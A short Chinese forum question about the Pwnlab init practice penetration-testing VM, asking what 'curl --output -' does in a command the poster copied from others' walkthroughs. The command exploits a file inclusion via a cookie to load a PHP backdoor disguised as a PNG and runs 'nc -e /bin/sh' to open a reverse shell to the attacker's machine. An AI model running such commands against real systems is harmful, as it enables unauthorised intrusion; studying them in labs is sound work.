我在做一个名为 Pwnlab init 的实践渗透测试虚拟机时使用了下面的 curl 查询。查询的目的是让index.php页面访问png文件,其实就是一个伪装的php后门脚本,然后让被攻击机器发出netcat命令连接到我的攻击机器。只有在研究了其他人如何能够成功完成虚拟机之后,我才知道使用此查询。我了解整个查询,除了第一部分curl --output -
。有人可以帮我解决这部分查询的作用吗?
curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png \
http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx